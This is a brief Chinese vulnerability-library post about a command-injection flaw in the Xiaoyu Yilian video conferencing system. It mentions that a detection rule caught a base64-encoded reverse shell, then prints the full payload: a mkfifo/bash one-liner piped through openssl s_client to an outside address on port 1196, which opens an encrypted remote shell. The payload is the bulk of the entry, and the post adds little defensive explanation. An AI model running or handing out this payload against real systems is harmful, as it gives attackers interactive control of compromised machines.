小魚易連視頻會議系統命令注入漏洞棉花糖2021年7月15日发布关注私信0110 # 小魚易連視頻會議系統命令注入漏洞 ==描述== 特徵發現:匹配規則base64編碼 解碼特徵(存在反彈shell) ==Payload== mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s © 版权声明文章版权归作者所有,未经允许请勿转载。THE END漏洞库 喜欢就支持一下吧点赞0赞赏 分享QQ空间微博QQ好友海报分享复制链接收藏
请登录后查看评论内容